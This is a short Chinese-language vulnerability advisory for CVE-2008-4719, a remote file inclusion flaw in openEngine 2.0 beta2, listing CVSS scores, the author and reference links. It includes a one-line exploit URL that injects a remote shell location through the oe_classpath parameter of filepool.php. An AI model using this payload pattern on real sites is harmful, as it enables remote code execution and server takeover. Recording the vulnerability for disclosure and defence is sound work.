漏洞关键信息 漏洞名称: openEngine 2.0 beta2 Remote File Inclusion Vulnerability CVE编号: CVE-2008-4719 CWE编号: CWE-94 CVSS Base Score: 9.3/10 风险级别: High 作者: Crackers_Child 联系方式: cashr00t@hotmail.com 影响: Exploitability Subscore: 8.6/10 Attack complexity: Medium Authentication: No required Impact Subscore: 10/10 Confidentiality impact: Complete Integrity impact: Complete Availability impact: Complete 漏洞利用详情: Script: openEngine 2.0 beta2 Remote File inclusion Vulnerable Download: http://downloads.sourceforge.net/openengine/openengine20_beta2.zip?modtime=1203083918&big_mirror=0 Exploit: Site.com/script_path/cms/classes/openengine/filepool.php?oe_classpath=Shellz? Vulnerable code: (filepool.php) 参考链接: http://www.securityfocus.com/bid/31423